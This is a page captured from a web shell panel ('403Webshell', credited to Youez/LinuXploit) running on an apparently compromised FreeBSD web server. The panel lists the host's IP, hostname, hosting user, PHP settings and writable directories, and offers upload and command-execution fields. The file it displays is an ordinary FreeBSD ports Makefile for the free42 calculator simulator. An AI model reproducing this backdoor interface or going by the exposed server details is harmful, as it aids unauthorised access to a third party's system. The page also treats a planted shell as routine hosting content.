403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/misc/free42/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/misc/free42/Makefile
PORTNAME=	free42
DISTVERSION=	3.0.14
CATEGORIES=	misc
MASTER_SITES=	http://thomasokken.com/free42/upstream/
DISTNAME=	${PORTNAME}-nologo-${DISTVERSION}

MAINTAINER=	yuri@FreeBSD.org
COMMENT=	Simulation of the HP-42S scientific calculator and HP-82240 printer
WWW=		https://thomasokken.com/free42

LICENSE=	GPLv2
LICENSE_FILE=	${WRKSRC}/COPYING

LIB_DEPENDS=	libfontconfig.so:x11-fonts/fontconfig \
		libfreetype.so:print/freetype2 \
		libharfbuzz.so:print/harfbuzz

USES=		compiler dos2unix gmake gnome localbase pkgconfig tar:tgz xorg
USE_GNOME=	atk cairo gdkpixbuf2 gtk30 pango
USE_XORG=	x11 xmu
DOS2UNIX_FILES=	gtk/IntelRDFPMathLib20U1/LIBRARY/float128/op_system.h \
		gtk/IntelRDFPMathLib20U1/LIBRARY/float128/architecture.h \
		gtk/IntelRDFPMathLib20U1/LIBRARY/src/bid_functions.h \
		common/bid_functions.h \
		gtk/IntelRDFPMathLib20U1/TESTS/test_bid_functions.h

CXXFLAGS+=	${CXXFLAGS_${CHOSEN_COMPILER_TYPE}}
CXXFLAGS_clang=	-Wno-c++11-narrowing -Wno-constant-conversion # to accommodate some code breaking with clang-50

BUILD_WRKSRC=	${WRKSRC}/gtk

VARIANTS=	bin dec

.for v in ${VARIANTS}
PLIST_FILES+=	bin/${PORTNAME}${v}
.endfor

post-extract:
	@cd ${BUILD_WRKSRC} && tar xfz ../inteldecimal/IntelRDFPMathLib20U1.tar.gz

post-patch:
	@${REINPLACE_CMD} -e 's|(free42dirname)|("${DATADIR}/skins")|' \
		${BUILD_WRKSRC}/shell_skin.cc

do-build:
.for v in ${VARIANTS}
	@${CP} -r ${BUILD_WRKSRC} ${BUILD_WRKSRC}-${v}
	@cd ${BUILD_WRKSRC}-${v} && \
		${SETENV} ${MAKE_ENV} ${MAKE_CMD} cleaner && \
		${SETENV} ${MAKE_ENV} ${v:S/dec/BCD_MATH=1/:S/bin//} ${MAKE_CMD}
.endfor

do-install:
.for v in ${VARIANTS}
	${INSTALL_PROGRAM} ${BUILD_WRKSRC}-${v}/free42${v} ${STAGEDIR}${PREFIX}/bin/
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit